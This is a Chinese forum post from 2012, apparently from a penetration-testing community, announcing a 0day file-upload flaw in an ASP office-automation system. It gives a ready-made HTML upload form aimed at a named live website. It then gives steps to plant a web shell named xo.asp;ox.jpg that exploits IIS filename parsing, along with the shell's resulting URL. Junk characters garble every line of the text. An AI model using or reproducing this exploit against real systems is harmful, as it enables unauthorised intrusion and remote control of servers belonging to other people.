中国网络渗透测试联盟

标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞 [打印本页]

作者: admin    时间: 2012-11-21 13:45
标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞
全能OA办公系统 上传漏洞: w* z/ v8 p5 b, L8 ?
# ]3 w) X6 S' u1 ^
系统介绍:
, \# ?* l) k5 C+ x* t. C% e+ g# U) Y
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。- W; T- Y! A2 t
6 T  r, K6 ^, F0 W6 X* O. C9 @" c
主要功能:
% \) u' n+ J* V9 Y3 c. V公司通告 ! G: P% T! v, L: l! X6 t+ g1 b+ y
工作计划
( s8 D0 d% }7 @. j5 O通讯助理 3 b/ ?4 H; e% }6 p5 M$ c1 ^2 l: F/ Q
客户资源
2 ]1 V& J8 @4 q1 n; I5 N我的公文 - f$ _6 u( k, i) L1 a
公文传阅
$ p4 H4 \  u% S/ b4 K公共资源
: d+ Y$ M8 r9 {! y4 M  m6 e资源预约 / |# ~% x; n5 V& e1 z6 c. [
今日考勤 + L  N) C3 ^/ K" s6 P
个人计划 2 _; K4 ]6 P3 |, u% C$ U
个人通讯录 % s: ?3 q2 ]9 D0 k% j- _3 n
个人基本档案 6 u# O, R7 c# M3 ?, |: t
未读邮件
0 I2 [- m" E0 f发邮件
7 ?5 T$ K: m4 O( y收件夹
4 Z2 ^4 A& X2 p# E7 N寄件夹
' x7 ^2 V3 F( k! v6 v+ u网络硬盘 / S; g+ R5 G. l. T- m9 d  U
网络会议 / N* a% m' C( r# k, G2 r/ l
网络调查
6 l: l! c0 P* Y$ x7 @交流论坛
& ^. M8 _; {4 C6 H9 {, j- Q- u1 V
4 Z, C( d; f- V! p) {有兴趣测试的朋友可以下源码看看- Z1 @0 a6 g  K8 ^+ L2 J) F- k; Q; d

  A% |3 S  r1 a+ J3 x源码下载:  Y' D6 |4 N7 `( O0 h
5 ^$ w+ H% q7 b/ l& Z; v& [
http://www.mycodes.net/30/4750.htm
8 l/ S- b$ _- T' |9 X' k! E" t
+ y# M/ E9 G& r- {& p3 [* u漏洞介绍:& L3 q) C/ H9 d2 S1 [" N( W0 W

! V- y9 }, V) N7 H5 @由upfile.asp上传文件漏洞引起8 G9 c* p2 w; p

# @: L# e! ~" m测试方法:+ p$ F) r, V. E. W* h' a

* L0 m9 ~; C! y使用名小子上传http://www.itlynn.com/upfile.asp即可6 T5 p+ i& O; M5 D+ W% c

$ N5 a- Y. E2 O9 y' L1 h如果upfile.asp文件被删除不存在。$ ^' z9 ]  l1 K1 r! Y) K9 E! N

! ]$ z  Q0 |8 C1 j: _8 L* i. m# Y  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp+ a) D: P+ r4 F' F, Q
) m6 j- P' _' T3 i! e
如果存在那么将如下代码保存为upfile.html。
, C5 S; J$ G6 _3 L9 h0 d0 ~: h1 _( X+ n/ M- T) p
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp6 Z, o9 M* F7 }0 {

4 e: k/ ^+ G" w3 ^+ b9 @) A& h ( ^4 J# u) |  W. i  n( ~4 h

& G0 p0 a, q: X7 f/ M2 C, C01 <table border='0' align="center" cellpadding="5"> ' K9 u  h% O& M( Z8 |
5 U; G' g5 R9 x/ U% z, o
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
. e7 D% K# M& r" p* m' Y4 U7 Y- P3 g: J
03 <tr>   x7 R' u  g& V# E

3 s- M) s( I8 u* M7 i04             <td>报错:</td>
+ C$ t9 X8 m" e7 b+ N1 V' P* A, Y( x- _# L
05             <td><input type='radio' name='errnumber' value='0'> 0 q! g2 j5 ?& a2 L
7 O  W" [, O. `5 H2 t
06               自动更名
+ b7 R0 S4 G, `0 d! r! `% z6 [0 f5 H6 I7 j9 W
07               <input type='radio' name='errnumber' value='1' checked> % S. I9 L; Y0 {! B

/ G( z1 x, r( E$ K2 E$ h# o08               报错方式
4 f6 n" e3 U9 T2 \6 Z0 E( A1 P% W. k  I, |; ?% x
09               <input type='radio' name='errnumber' value='2'> 1 _8 l9 y$ z$ q& \5 n; l) y
( ]4 P, o6 B5 K1 J- {! }! C3 Q
10               直接覆盖</td> ! O( R/ a: k: }) R! ?6 a
$ A6 t) u( u" z9 p
11           </tr> + o$ N) k; x$ F! S
% R  g* g  o/ K& ~! b
12           <tr>
4 k! f( Z% m( J# D+ L
$ r9 o) Y& Z- ?/ |0 }1 A# Y13             <td>主题:</td>
( ~  D0 H& L( f( S8 }+ |2 |  ?: `6 u6 J) _
14             <td><input type='text' name='filename' size='30'></td> 6 e' [) B2 s. p) B+ u1 i
7 `7 n+ z' f) n; ^0 N* ?
15           </tr>
  O4 Q6 j* A' Z
  @! `2 D% \& z4 E7 H' f' H16           <tr> % j6 j: o& p/ ]

4 _, V( @. [, h17             <td>文件:</td> 9 r# y, F0 n- y$ I, Q( [1 \
& O% h. m& f2 ^$ l1 r0 J
18             <td><input type="file"name="fruit"size="30"></td> ; O! X  W& X$ n* J. x6 n) I
) n* G' x! j9 z
19           </tr> & K5 r% J$ ^. S5 P8 T

2 S) V3 n/ L, q1 `6 x20           <tr>
- s0 ^. f8 h; M; F9 \+ i
$ V8 _' `* ^/ D0 f6 e  o$ x21             <td valign='top'>简介:</td>
1 A- H: F$ ~  j8 M7 j; R$ Z" i2 O  {* n* q4 K
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
' E% A- Y& w' D- E  g' L7 R( c. ?5 x. }( T0 J
23           </tr>
! e5 o4 m! d& o8 O) j& T' n) X1 l" o0 A% e+ v( B8 H# K, U- m' T0 M
24   ' K) ?# t! p& ]6 x% ^( v
; T% A* ~. }9 p" {( n4 x  |
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
- U1 u( K' k  T3 Z: F5 \1 ]4 k- T3 M) Q8 u
26           </tr>
! I0 I3 [5 p! |) H' f# K" q' {! L( L. O$ J% }
27         </form>
6 O# N( ?# d) g$ o7 l6 f" t9 ?6 i: D9 _# J- y0 i) l
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
! X, B$ ^; E2 b! ~/ r' x- p
* w! U, r% J3 s3 J% \( d
, z. N3 L1 a: ]4 h! r  K
6 D9 S; v$ F, M7 S4 y( W* `! ^上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg1 ?& H  `) x# ~
( s2 h/ @4 l2 s
此漏洞需要配合解析漏洞利用。
: l6 q. c' f+ @! `' E: c0 [# @% |* B2 E+ ^+ V





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2